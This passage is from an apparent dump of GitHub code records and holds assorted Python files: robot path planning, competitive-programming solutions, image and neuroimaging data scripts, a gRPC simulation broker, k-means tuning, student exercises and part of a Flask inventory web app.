obstacle_tree)\n # self.plot_road_map(road_map_info, sample_x, sample_y)\n rx, ry = DijkstraSearch( self.show_animation ).search(sx, sy, gx, gy,\n sample_x, sample_y,\n road_map_info)\n \n assert rx, 'Cannot found path'\n\n if self.show_animation: \n plt.plot(rx, ry, \"-r\")\n plt.pause(0.1)\n plt.show()\n \n return rx, ry\n\n def is_collision(self, sx, sy, gx, gy, rr, obstacle_kd_tree):\n x = sx\n y = sy\n dx = gx - sx\n dy = gy - sy\n yaw = math.atan2(gy - sy, gx - sx)\n d = math.hypot(dx, dy)\n\n if d >= self.MAX_EDGE_LEN:\n return True\n\n D = rr\n n_step = round(d / D)\n\n for i in range(n_step):\n dist, _ = obstacle_kd_tree.query([x, y])\n if dist <= rr:\n return True # collision\n x += D * math.cos(yaw)\n y += D * math.sin(yaw)\n\n # goal point check\n dist, _ = obstacle_kd_tree.query([gx, gy])\n if dist <= rr:\n return True # collision\n\n return False # OK\n\n def generate_road_map_info(self, node_x, node_y, rr, obstacle_tree):\n \"\"\"\n Road map generation\n\n node_x: [m] x positions of sampled points\n node_y: [m] y positions of sampled points\n rr: Robot Radius[m]\n obstacle_tree: KDTree object of obstacles\n \"\"\"\n\n road_map = []\n n_sample = len(node_x)\n node_tree = cKDTree(np.vstack((node_x, node_y)).T)\n\n for (i, ix, iy) in zip(range(n_sample), node_x, node_y):\n\n dists, indexes = node_tree.query([ix, iy], k=n_sample)\n\n edge_id = []\n\n for ii in range(1, len(indexes)):\n nx = node_x[indexes[ii]]\n ny = node_y[indexes[ii]]\n\n # if(nx==self.gx and ny==self.gy ):\n # edge_id.append(indexes[ii])\n \n if not self.is_collision(ix, iy, nx, ny, rr, obstacle_tree):\n edge_id.append(indexes[ii])\n\n if len(edge_id) >= self.N_KNN:\n break\n\n road_map.append(edge_id)\n\n #self.plot_road_map(road_map, node_x, node_y)\n\n return road_map\n\n @staticmethod\n def plot_road_map(road_map, sample_x, sample_y): # pragma: no cover\n\n for i, _ in enumerate(road_map):\n for ii in range(len(road_map[i])):\n ind = road_map[i][ii]\n\n plt.plot([sample_x[i], sample_x[ind]],\n [sample_y[i], sample_y[ind]], \"-k\")\n\n @staticmethod\n def voronoi_sampling(sx, sy, gx, gy, ox, oy):\n oxy 
= np.vstack((ox, oy)).T\n\n # generate voronoi point\n vor = Voronoi(oxy)\n sample_x = [ix for [ix, _] in vor.vertices]\n sample_y = [iy for [_, iy] in vor.vertices]\n\n sample_x.append(sx)\n sample_y.append(sy)\n sample_x.append(gx)\n sample_y.append(gy)\n\n return sample_x, sample_y\n\nif __name__==\"__main__\":\n planner = VoronoiRoadMapPlanner(show_animation=True)\n planner.planning()","repo_name":"marios-stam/Collaborative-Drones_Flexible-Objects","sub_path":"thesis_drone/src/path_planning/path_planner.py","file_name":"path_planner.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25654999225","text":"def solve():\n N, K = map(int, input().split())\n ans = 0\n\n for i in range(1, N+1):\n count = 0\n while i * 2 ** count < K:\n count += 1\n ans += (1 / N) * (1 / 2 ** count)\n\n print(ans)\n\nif __name__ == '__main__':\n solve()","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC126/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7765202726","text":"from PIL import Image\nimport numpy as np\nimport os\nimport re\n\ndef is_feature_present(input_array):\n # num_1 = np.count_nonzero(input_array)\n # num_0 = 512*512 - num_1\n # print('********point1***********\\n label #1 > #0', num_1>num_0)\n # assert num_1 < num_0, 'label 1 should be label but now is background'\n \n return (np.sum(input_array)>0)\n\n\ndef load_feature_data(frame_dir, mask_dir, gradient=False, dim=512):\n \n '''load frames and masks into two numpy array respectively\n -----\n condition: with feature\n input: frame_dir, mask_dir (each file in tif format)\n -----\n '''\n frames = []\n masks = []\n minn = float(\"inf\")\n maxx = 0.0\n frame_names = os.listdir(frame_dir)\n frame_names.sort(key=lambda var:[int(x) if x.isdigit() else x \n for x in re.findall(r'[^0-9]|[0-9]+', var)])\n for frame_file in frame_names:\n frame_path = os.path.join(frame_dir, frame_file)\n if frame_file[-3:]=='tif':\n mask_path = os.path.join(mask_dir, frame_file.replace('fillnodata','building_label'))\n frame_array = np.array(Image.open(frame_path))\n label_array = np.array(Image.open(mask_path))\n else:\n mask_path = os.path.join(mask_dir, frame_file)\n frame_array = np.load(frame_path)\n label_array = np.load(mask_path)\n frame_array = frame_array\n dims = frame_array.shape\n if dims[0]!=dim or dims[1]!=dim:\n continue\n if(is_feature_present(label_array)):\n if gradient:\n [dx, dy] = np.gradient(frame_array)\n frame_array = np.sqrt((dx*dx)+(dy*dy))\n amin, amax = np.min(frame_array), np.max(frame_array)\n if amin < minn: minn = amin \n if amax > maxx: maxx = amax \n frames.append(frame_array)\n masks.append(label_array)\n \n return np.array(frames),np.array(masks), minn, maxx\n\ndef preprocess(Data, minn, maxx, dim=128, low=0.1, hi=1.0):\n \"\"\"Normalize and rescale (and optionally invert) images by local minn and maxx. \n Parameters\n ----------\n Data : hdf5\n Data array.\n dim : integer, optional\n Dimensions of images, assumes square.\n low : float, optional\n Minimum rescale value. Default is 0.1 since background pixels are 0.\n hi : float, optional\n Maximum rescale value.\n \"\"\"\n for key in Data:\n print (key)\n\n Data[key][0] = Data[key][0].reshape(len(Data[key][0]), dim, dim, 1)\n for i, img in enumerate(Data[key][0]):\n img = img / 255.\n # img[img > 0.] = 1. - img[img > 0.] 
#inv color\n minn, maxx = np.min(img[img > 0]), np.max(img[img > 0])\n img[img > 0] = low + (img[img > 0] - minn) * (hi - low) / (maxx - minn)\n Data[key][0][i] = img \n \n","repo_name":"IllinoisStateGeologicalSurvey/DEM_segmentation","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73001527507","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n# data = pd.read_excel('thickness/sub_01_thickness.xlsx')\r\n# roiname = data['StructName']\r\n# roiname.to_csv('rois/RoiName.csv')\r\n\r\nroiname = list(pd.read_csv('rois/RoiName.csv')['StructName'])\r\n\r\nparticipants = pd.read_excel('fmriprep/participants.xlsx')\r\nsubindex = np.array(participants['subindex'])\r\ncondition = participants['Condition3']\r\n\r\ni = 0\r\nCortThick = pd.DataFrame(np.zeros((98,360)),columns=roiname)\r\n\r\nfor sub in subindex:\r\n if sub < 10:\r\n path = \"thickness/sub_0\" + str(sub) + \"_thickness.xlsx\"\r\n data = pd.read_excel(path)\r\n value = pd.Series(np.array(data['Mean']), index=list(roiname))\r\n CortThick.loc[i] = value\r\n i = i + 1\r\n else:\r\n path = \"thickness/sub_\" + str(sub) + \"_thickness.xlsx\"\r\n data = pd.read_excel(path)\r\n value = pd.Series(np.array(data['Mean']), index=list(roiname))\r\n CortThick.loc[i] = value\r\n i = i + 1\r\n\r\nCortThick.insert(0,\"SubIndex\",subindex,True)\r\nCortThick.insert(1,\"Condition\",condition,True)\r\n\r\nCortThick.to_csv('processdata/CortThick.csv')\r\n\r\n# convert into nparray\r\nAnatomicalRegressor = pd.read_csv('processdata/CortThick.csv')\r\nCortThickness = np.array(AnatomicalRegressor[AnatomicalRegressor.columns[3:363]])\r\nnp.save(\"processdata/CortThickness\",CortThickness)\r\n\r\n","repo_name":"BeiGeJin/SchizophreniaClassifier","sub_path":"GetCortThick.py","file_name":"GetCortThick.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8126757551","text":"class Solution(object):\n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n larger = p = len(nums) - 1\n while p >= 1 and nums[p] <= nums[p - 1]:\n p -= 1\n if p == 0:\n nums.reverse()\n return\n while larger >= 0 and nums[larger] <= nums[p - 1]:\n larger -= 1\n nums[larger], nums[p - 1] = nums[p - 1], nums[larger]\n # reverse the remain\n l = p\n r = len(nums) - 1\n while l < r:\n nums[l], nums[r] = nums[r], nums[l]\n l += 1\n r -= 1\n\n\n\n","repo_name":"YingbingZhu/python_leetcode","sub_path":"two_pointers/31. Next Permutation.py","file_name":"31. 
Next Permutation.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15537188385","text":"from concurrent import futures\nimport sys\n\nimport argparse\nimport grpc\nimport numpy as np\n\nimport trustworthy_search_pb2_grpc as rpc\nimport trustworthy_search_pb2 as ts\n\n\n# Implementation of Broker service from trustworthy_search.proto\nclass Broker(rpc.BrokerServicer):\n # Upon initialization of the broker, connect the search stub (the\n # connection to the server) as an instance variable\n # This broker is identified by its (unique) port\n def __init__(self, stub, port):\n self.searchstub = stub\n self.port = port\n np.random.seed(port)\n\n # Push the result from the simulation worker to the search server\n def PushResult(self, request, context):\n request = self.searchstub.UploadSimResult(request)\n return ts.Empty()\n\n\n# Simple load balancing: randomly select a worker who has finished the last\n# job given to it by this broker\ndef getWorkerIndex(worker_futures):\n while True:\n for i in np.random.permutation(len(worker_futures)):\n future = worker_futures[i]\n if future is None or future.done():\n return i\n\n\n# Main function to run a job\ndef run(BROKER_PORT, WORKERPORTSTART, num_workers,\n SSLcertfile, serverURL, serverport,\n threshold, num_evals, grid_density, job_type):\n # open client to search server\n # The communication is authenticated via SSL for security\n with open(SSLcertfile, 'rb') as f:\n creds = grpc.ssl_channel_credentials(f.read())\n search_channel = grpc.secure_channel(serverURL+':'+str(serverport), creds)\n search_stub = rpc.TrustworthySearchStub(search_channel)\n\n # Open broker server. The broker distributes jobs amongst simulation\n # workers\n broker_server = grpc.server(futures.ThreadPoolExecutor(max_workers=100))\n broker = Broker(search_stub, BROKER_PORT)\n rpc.add_BrokerServicer_to_server(broker, broker_server)\n broker_server.add_insecure_port('localhost:'+str(BROKER_PORT))\n broker_server.start()\n\n # Connect a client to simulation workers\n # For this example, the workers are also running on the same machine\n worker_channels = []\n worker_stubs = []\n worker_futures = []\n for i in range(WORKERPORTSTART, WORKERPORTSTART+num_workers):\n worker_channel = grpc.insecure_channel('localhost:' + str(i))\n worker_stub = rpc.SimulatorStub(worker_channel)\n worker_stub.RegisterBroker(ts.BrokerPort(port=BROKER_PORT))\n worker_channels.append(worker_channel)\n worker_stubs.append(worker_stub)\n worker_futures.append(None)\n\n # Start the job by making a request to the search server\n job = search_stub.StartJob(ts.JobRequest(threshold=threshold,\n dimension=2,\n dist_types=[ts.Distribution.GAUSSIAN]*2,\n job_type=job_type,\n job_mode=ts.JobStyle.Mode.MAXIMIZE,\n num_evals=num_evals,\n grid_density=grid_density))\n print('Job id:', job.jobid)\n print('User-input event threshold: ', threshold)\n print('Number of simulations:', num_evals)\n # print information that the server has given about the job (if it exists)\n if len(job.info) > 0:\n print(job.info, '\\n')\n\n # Receive jobs from the search server and distribute amongst the workers\n # The jobs will run asynchronously.\n for simparams in search_stub.OpenSimStream(job):\n idx = getWorkerIndex(worker_futures)\n brokerparams = ts.BrokerSimParams(simparams=simparams, port=BROKER_PORT)\n # asynchronous call to simulation worker\n worker_futures[idx] = worker_stubs[idx].Simulate.future(brokerparams)\n if 
simparams.simid % 5:\n            temp = round(100*(simparams.simid+1)*1.0/num_evals)\n            sys.stdout.write(\"\\rEstimated percent complete: %d%%\" % (temp))\n            sys.stdout.flush()\n    print('\\nDone')\n\n    # Get results\n    print('\\nIn this demo, we return the results of the job you just ran.')\n    print('Specifically, we give you back a list of the parameters simulated along with the corresponding objectives.')\n    print('The full API includes further analysis of the failure modes discovered (eg dimensionality-reduced visualizations, importance-sampler built on failure modes, etc).\\n')\n    jobresult = search_stub.GetJobResult(job)\n\n    print('Sim id', '\\t', 'Done', '\\t', 'Params', '\\t', 'Objective')\n    np.set_printoptions(precision=2)\n    for result in jobresult.results:\n        print(result.simid, '\\t', result.completed, '\\t', np.array(result.params), '\\t', result.objective)\n\n    # Close search and worker clients, and stop broker server\n    for i in range(len(worker_stubs)):\n        worker_stubs[i].DeregisterBroker(ts.BrokerPort(port=BROKER_PORT))\n        worker_channels[i].close()\n    broker_server.stop(0)\n    search_channel.close()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--port', type=int, required=True, help='Pick a unique port not used by any other process (including other brokers). 5000 is usually a good choice.')\n    parser.add_argument('--workerportstart', type=int, default=6000, help='default = 6000')\n    parser.add_argument('--num_workers', type=int, default=10, help='default = 10')\n    parser.add_argument('--SSLcert', default='trial_server.crt', help='default = trial_server.crt')\n    parser.add_argument('--serverURL', default='trial.trustworthy.ai', help='default = trial.trustworthy.ai')\n    parser.add_argument('--serverport', type=int, default=443, help='default = 443')\n    parser.add_argument('--threshold', type=float, default=2, help='Threshold level (gamma) for event search. Default = 2')\n    parser.add_argument('--num_evals', type=int, default=100, help='Number of simulations to run. Default = 100')\n    parser.add_argument('--grid_density', type=int, nargs='+', default=[10, 10], help='Grid density for GRID job style. 
Default 10 10')\n parser.add_argument('--job_type', type=str, choices=['MONTECARLO', 'GRID', 'STRESSTEST', 'RISK'], default='MONTECARLO',\n help='Options are MONTECARLO (default), GRID, STRESSTEST, RISK')\n args = parser.parse_args()\n type_dict = {'RISK': ts.JobStyle.Type.RISK,\n 'GRID': ts.JobStyle.Type.GRID,\n 'MONTECARLO': ts.JobStyle.Type.MONTECARLO,\n 'STRESSTEST': ts.JobStyle.Type.STRESSTEST}\n run(args.port, args.workerportstart, args.num_workers,\n args.SSLcert, args.serverURL, args.serverport,\n args.threshold, args.num_evals, args.grid_density, type_dict[args.job_type])\n","repo_name":"amansinha/trustworthysearch-demo","sub_path":"python/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":6724,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"70206816147","text":"''' optimization for k-means algorithm, given target file'''\nfrom misc import *\ninfile = \"stack.bin\" # default input file\n\nif len(args) < 2 and not os.path.exists(\"stack.bin\"): err(\"kmeans_optimization.py [input image to run kmeans on]\")\nelse:\n if len(args) > 1: infile = args[1]\n\nif not os.path.exists(infile): err(\"failed to find input file: \" + infile)\n\ntf = infile + \"_targets.csv\"\nif not os.path.exists(tf):\n error(\"targets file not found: \" + str(tf))\nlines = open(tf).read().strip().split(\"\\n\")\nlines = [line.strip().split(\",\") for line in lines]\nhdr = lines[0] # 'row', 'lin', 'xoff', 'yoff'\ni_row, i_lin, i_xof, i_yof, i_lab, sep = hdr.index('row'), hdr.index('lin'), hdr.index('xoff'), hdr.index('yoff'), hdr.index('feature_id'), os.path.sep\npath = sep.join(__file__.split(sep)[:-1]) + sep # path to this file\nprint(\"path\", path)\npath = os.path.abspath(os.path.expanduser(os.path.expandvars(path))) + sep\n\nncol, nrow, bands = read_hdr(infile[:-3] + 'hdr') # read info from image file\nncol, nrow, bands = int(ncol), int(nrow), int(bands)\n\nc, class_label = {}, {} # start K at number of labels\nfor i in range(1, len(lines)): # iterate over the vector labels\n line = lines[i] # csv data\n label = line[i_lab] # text label from csv\n x, y = int(line[i_row]), int(line[i_lin])\n ix = (y * ncol) + x # image coordinates of the point! \n if ix < nrow * ncol: # skip if out of bounds\n class_label[ix] = label # lookup from pix/line coords to text label\n c[label] = (c[label] + 1) if label in c else 1 # start count from 1\nK = len(c) # starting number of classes\n# K -= 1 # for testing, delete this line later\n\ngo = True\nwhile go:\n whoami = os.popen(\"whoami\").read().strip()\n exe = os.path.normpath(path + \"../cpp/kmeans_multi.exe\") # parallel kmeans function executable\n run(exe + \" \" + infile + \" \" + str(K) + \" 3.\") # run kmeans in parallel\n class_file = infile + \"_kmeans.bin\"\n ncol, nrow, bands, data = read_binary(class_file) # read the class map data resulting from kmeans\n\n # data[ data == 0.] 
= float(\"nan\")\n # print(\"labels\", set(data))\n\n\n kmeans_label = {}\n for i in range(1, len(lines)): # for each vector point of ours\n line = lines[i]\n x, y = int(line[i_row]), int(line[i_lin]) # rowcol coords for the point\n ix = (y * ncol) + x # print(\"row\", line[i_row], line[i_lin], line[i_xof], line[i_yof], line[i_lab], \"class\", data[ix])\n if ix < nrow * ncol:\n kmeans_label[ix] = data[ix]\n\n kmeans_label_by_class = {}\n for p in class_label:\n L = class_label[p]\n kmeans_label_by_class[L] = [] if (L not in kmeans_label_by_class) else (kmeans_label_by_class[L])\n kmeans_label_by_class[L].append(kmeans_label[p])\n\n for c in kmeans_label_by_class: # what would a vectorization for an op like this look like?\n kmeans_label_by_class[c] = set(kmeans_label_by_class[c])\n print(kmeans_label_by_class)\n\n # check if we're done\n bad, empty = False, set()\n for k in kmeans_label_by_class:\n kk = kmeans_label_by_class[k]\n for j in kmeans_label_by_class:\n if k == j: continue\n kj = kmeans_label_by_class[j]\n if kk.intersection(kj) != empty:\n bad = True\n \n if not bad:\n print(\"good\") # clean up labels so that everything outside the known classes is 0, and all clusters for class get same label..\n used_labels = set()\n for k in kmeans_label_by_class:\n for j in kmeans_label_by_class[k]:\n used_labels.add(j)\n print(\"used_labels\", used_labels) \n\n lookup = {}\n for k in range(0, K):\n k = float(k)\n if k not in used_labels:\n lookup[k] = 0.\n\n ci = 1\n for k in kmeans_label_by_class:\n for j in kmeans_label_by_class[k]:\n lookup[j] = ci\n ci += 1\n\n print(\"lookup\", lookup) # now apply lookup\n for i in range(0, nrow* ncol): data[i] = lookup[data[i]]\n\n write_binary(data, class_file) # relabel the data and output\n break # kmeans_label_by_class: {'fireweedandaspen': [0.0], 'blowdownwithlichen': [1.0, 0.0], 'pineburned': [1.0, 1.0, 1.0]}\n K += 1 # try adding a class!\nprint(\"kmeans_label_by_class\", kmeans_label_by_class, \"lookup\", lookup)\n\n# translate the lookup\nfor label in kmeans_label_by_class:\n labels = list(kmeans_label_by_class[label])\n labels = [lookup[i] for i in labels]\n kmeans_label_by_class[label] = set(labels)\nprint(\"kmeans_label_by_class\", kmeans_label_by_class)\n\n\n# do the plotting! \n\nimport matplotlib.pyplot as plt\nhdr = hdr_fn(infile)\nnpx = nrow * ncol\ndata = data.reshape((nrow, ncol))\n\nfig, ax = plt.subplots()\nimg = ax.imshow(data, cmap='Spectral')\n# ax.set_aspect(\"auto\")\ncbar = plt.colorbar(img)# .legend([0, 1, 2, 3], ['0', '1', '2', '3'])\\\ntick_labels = [\"noise\"]\nci = 1\nfor label in kmeans_label_by_class:\n tick_labels.append(label)\n x = kmeans_label_by_class[label]\n if set([ci]) != x:\n err(\"color index problem\")\n ci += 1\ncbar.set_ticks(np.arange(len(tick_labels)))\nprint(\"tick_labels\", tick_labels)\ncbar.ax.set_yticklabels(tick_labels) #\"bad\", \"good\", \"other\", \"more\", \"what\"])\nplt.tight_layout()\nplt.show()\n# run(\"python3 \" + path + \"read_multi.py \" + infile + \"_kmeans.bin\")\n","repo_name":"bcgov/wps-research","sub_path":"py/bak/kmeans_optimize.py","file_name":"kmeans_optimize.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"43529567652","text":"# Задача 1. Задайте натуральное число N. 
Напишите программу, которая составит список простых множителей числа N.\n# 60 -> 2, 2, 3, 5\n\ndef Prime(x):\n import math\n simple = True\n i = 2\n while i <= math.sqrt(x):\n if x % i == 0:\n simple = False\n break\n i += 1\n return(simple)\n\ndef Task1():\n N = int(input('Введите N: '))\n if Prime(N) == True and N == 1:\n print(f'{N} --> [1]')\n\n elif Prime(N) == True and N != 1:\n print(f'{N} --> [1, {N}]')\n\n else:\n nuturalNum = []\n N1 = N\n for i in range (2, (N1//2)+1):\n if Prime(i) == True:\n while N1 % i == 0:\n nuturalNum.append(i)\n N1 /= i\n print(f'{N} --> {nuturalNum}')\n\n\n# Задача 2. В первой строке файла находится информация об ассортименте мороженного,\n# во второй - информация о том, какое мороженное есть на складе. Выведите названия\n# того товара, который закончился.\n# 1. «Сливочное», «Бурёнка», «Вафелька», «Сладкоежка»\n# 2. «Сливочное», «Вафелька», «Сладкоежка»\n# Закончилось: «Бурёнка»\n\n\ndef Task2():\n data = open('ice_cream.txt', encoding='utf-8')\n iceCr = data.readlines()\n data.close()\n\n line1 = set(iceCr[0].replace('\\n', '').split(', '))\n line2 = set(iceCr[1].replace('\\n', '').split(', '))\n print(line1,'\\n', line2)\n print(f'Закончилось: {line1.difference(line2)}')\n \n\n\n# Задача 3. Выведите число π с заданной точностью.\n# Точность вводится пользователем в виде натурального числа.\n# 3 -> 3.142\n# 5 -> 3.14159\n\n\ndef Task3():\n a = int(input('Задайте точность числа пи: '))\n import math\n print(f'{round(math.pi, a)}')\n\n\n# Навигация по задачам в ДЗ №4\nhomework = True\nwhile homework:\n homework = (input(\"Введите номер задачи (1, 2, 3), для выхода введите 'exit': \"))\n if homework == 'exit':\n homework = not homework\n if homework == '1':\n Task1()\n elif homework == '2':\n Task2()\n elif homework == '3':\n Task3()\n","repo_name":"MackAndr/homework_python","sub_path":"homework4.py","file_name":"homework4.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11625301467","text":"import re\n\n\ndef start():\n global file_name\n file_name = input(\"Please, input file name (ex: text.txt)\\n\")\n start() if not file_name else mode_select()\n mode_select()\n\n\ndef mode_select():\n mode = input(\"Please, select mode (r/w):\\n\")\n read_mode() if mode == 'r' else write_mode()\n\n\ndef read_mode():\n read_file = open(file_name, 'r')\n print(read_file.read())\n read_file.close()\n\n\ndef write_mode():\n global file\n numbers = []\n file = open(file_name, 'a')\n amount = is_int(input(\"Please, enter amount of numbers\\n\"))\n print(\"Please, enter numbers (one per line)\\n\")\n for i in range(amount):\n enter = input()\n is_empty(enter)\n num = is_real(enter)\n numbers.append(num)\n save(numbers)\n\n\ndef is_empty(enter):\n if enter == \"\":\n print(\"Empty string\\n\")\n write_mode()\n else:\n return\n\n\ndef is_int(num):\n if num.isdigit() and int(num) >= 0:\n return int(num)\n else:\n raise ValueError(\"Amount must be an integer\")\n\n\ndef is_real(num):\n if num.isdigit():\n return int(num)\n elif re.match(\"\\d+\\.\\d+\", num):\n return float(num)\n else:\n raise ValueError(\"Amount or number is not a real numbers\")\n\n\ndef save(numbers):\n decision = input(\"Save and close? 
y/n \\n\")\n if decision == 'Y' or decision == 'y':\n lines = (\"\\n\" + \"\\n\".join(map(str, numbers)))\n file.write(lines)\n file.close()\n print(\"File saved and closed\")\n elif decision == 'N' or decision == 'n':\n mode_select()\n else:\n print('You should print only \"y\" or \"n\"')\n\n\nstart()","repo_name":"soberdeer/psp","sub_path":"A1/1B.py","file_name":"1B.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24388154481","text":"# -*- coding: utf-8 -*-\n\nimport sys\ndefaultencoding = 'utf-8'\nif sys.getdefaultencoding() != defaultencoding:\n reload(sys)\n sys.setdefaultencoding(defaultencoding)\n\n\nfrom flask import request, flash, render_template, redirect, url_for\nfrom . import main\nfrom .forms import ServerForm, RaidForm, SwitchForm\nfrom ..models import ServerModel, RaidModel, SwitchModel, db\nfrom ..initdb import get_ks3200_info, get_r5300_info, get_switch_info, update_server_DB, update_switch_DB, update_storage_DB\nimport regex as re\nimport xlwt\nimport xlrd\nfrom flask import send_file, send_from_directory\n\nimport os\nfrom flask import Flask, request\nfrom werkzeug.utils import secure_filename\nimport logging\n\nmain_logger = logging.getLogger('cmdb-zte-1.app.main')\n\n@main.route('/', methods=['GET'])\ndef root():\n return redirect(url_for('main.index'))\n\n\n@main.route('/index', methods=['GET'])\ndef index():\n server_on = ServerModel.query.filter(ServerModel.STATUS.endswith('ON')).all()\n server_on_count = len(server_on)\n server_all = ServerModel.query.all()\n server_all_count = len(server_all)\n switch_on = SwitchModel.query.filter(SwitchModel.STATUS.endswith('ON')).all()\n switch_on_count = len(switch_on)\n switch_all = SwitchModel.query.all()\n switch_all_count = len(switch_all)\n raid_on = RaidModel.query.filter(RaidModel.STATUS.endswith('ON')).all()\n raid_on_count = len(raid_on)\n raid_all = RaidModel.query.all()\n raid_all_count = len(raid_all)\n t1 = 0\n for server in server_on:\n t = server.UPTIME.split(' ')\n if len(t) > 1:\n if len(t) > 6:\n t_1 = t[0].split('天')\n t_2 = t[1].split('小时')\n t_3 = t[2].split('分钟')\n t1 = int(t_1[0])*24 + int(t_2[0]) + int(t_3[0]) % 60 + t1\n else:\n t_1 = t[0].split('小时')\n t_2 = t[1].split('分钟')\n t1 = int(t_1[0]) + int(t_2[0]) % 60 + t1\n t2 = 0\n for switch in switch_on:\n t = switch.UPTIME.split(' ')\n if len(t) > 1:\n if len(t) > 6:\n t_1 = t[0].split('天')\n t_2 = t[1].split('小时')\n t_3 = t[2].split('分钟')\n t2 = int(t_1[0]) * 24 + int(t_2[0]) + int(t_3[0]) % 60 + t2\n else:\n t_1 = t[0].split('小时')\n t_2 = t[1].split('分钟')\n t2 = int(t_1[0]) + int(t_2[0]) % 60 + t2\n t3 = 0\n raid_used = 0\n for raid in raid_on:\n t = raid.UPTIME.split(' ')\n if len(t) > 1:\n if len(t) > 6:\n t_1 = t[0].split('天')\n t_2 = t[1].split('小时')\n t_3 = t[2].split('分钟')\n t3 = int(t_1[0]) * 24 + int(t_2[0]) + int(t_3[0]) % 60 + t3\n else:\n t_1 = t[0].split('小时')\n t_2 = t[1].split('分钟')\n t3 = int(t_1[0]) + int(t_2[0]) % 60 + t3\n raid_used = float(raid.USEDPERCENT) + raid_used\n raid_used = raid_used*100/raid_on_count\n raid_used = round(raid_used, 2)\n return render_template('index.html', server_on_count=server_on_count, server_all_count=server_all_count,\n switch_on_count=switch_on_count,switch_all_count=switch_all_count,\n raid_on_count=raid_on_count, raid_all_count=raid_all_count, raid_used=raid_used,\n server_time=t1, switch_time=t2, raid_time=t3)\n\n\n@main.route('/manage', methods=['GET'])\ndef manage():\n return 
render_template('manage.html')\n\n\n@main.route('/raid', methods=['GET', 'POST'])\ndef raid():\n raidmodels = RaidModel.query.all()\n return render_template('raid.html', raidmodels=raidmodels)\n\n\n@main.route('/switch', methods=['GET', 'POST'])\ndef switch():\n switchmodels = SwitchModel.query.all()\n return render_template('switch.html', switchmodels=switchmodels)\n\n\n@main.route('/server', methods=['GET', 'POST'])\ndef server():\n servermodels = ServerModel.query.all()\n return render_template('server.html', servermodels=servermodels)\n\n\n@main.route('/server/add', methods=['GET', 'POST'])\ndef addServer():\n serverform = ServerForm()\n print('submit:')\n print(serverform.validate_on_submit())\n print(serverform)\n if serverform.validate_on_submit():\n if not re.match('[0-9]{2,3}', serverform.position4.data):\n main_logger.warning('%s 添加服务器失败:房间号格式不正确 %s', 'manager', serverform.ip.data)\n else:\n if ServerModel.query.filter_by(IP=serverform.ip.data).first():\n main_logger.warning('%s 添加服务器失败:IP地址冲突 %s', 'manager', serverform.ip.data)\n else:\n if serverform.assertnum.data and ServerModel.query.filter_by(AssertNum=serverform.assertnum.data).first():\n main_logger.warning('%s 添加服务器失败:资产编号冲突 %s', 'manager', serverform.ip.data)\n else:\n position = serverform.position1.data + '-' + serverform.position2.data + '-' + \\\n serverform.position3.data + '-' + serverform.position4.data\n a = get_r5300_info(serverform.ip.data, serverform.model.data,\n position, serverform.owner.data, serverform.assertnum.data)\n if not a:\n servermodel = ServerModel(MODEL=serverform.model.data, POSITION=position,\n OWNER=serverform.owner.data, AssertNum=serverform.assertnum.data,\n IP=serverform.ip.data, MAC='', STATUS='OFF', UPTIME='')\n db.session.add(servermodel)\n db.session.commit()\n main_logger.info('%s 添加服务器成功: %s', 'manager', serverform.ip.data)\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n return render_template('addserver.html', form=serverform)\n\n\n@main.route('/server/modify', methods=['GET', 'POST'])\ndef modifyServer():\n serverid = request.args.get('id', '')\n servermodel = ServerModel.query.filter_by(ID=serverid).first()\n serverposition = servermodel.POSITION.split('-')\n serverform = ServerForm(model=servermodel.MODEL, ip=servermodel.IP,\n mac=servermodel.MAC, owner=servermodel.OWNER,\n status=servermodel.STATUS, uptime=servermodel.UPTIME,\n assertnum=servermodel.AssertNum, position1=serverposition[0],\n position2=serverposition[1], position3=serverposition[2], position4=serverposition[3])\n if serverform.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', serverform.position4.data):\n flash('房间号格式不正确')\n else:\n # if not re.match('([A-Fa-f0-9]{2}:){5}[A-Fa-f0-9]{2}', serverform.mac.data):\n # flash('MAC地址格式不正确')\n # else:\n if serverform.ip.data != servermodel.IP and ServerModel.query.filter_by(IP=serverform.ip.data).first():\n flash('IP地址冲突')\n else:\n if serverform.mac.data != servermodel.MAC and ServerModel.query.filter_by(MAC=serverform.mac.data).first():\n flash('MAC地址冲突')\n else:\n if serverform.assertnum.data != servermodel.AssertNum and \\\n ServerModel.query.filter_by(AssertNum=serverform.assertnum.data).first():\n flash('资产编号冲突')\n else:\n serverposition = serverform.position1.data + '-' + serverform.position2.data + '-' + \\\n serverform.position3.data + '-' + serverform.position4.data\n servermodel.MODEL = serverform.model.data\n servermodel.IP = serverform.ip.data\n servermodel.POSITION = 
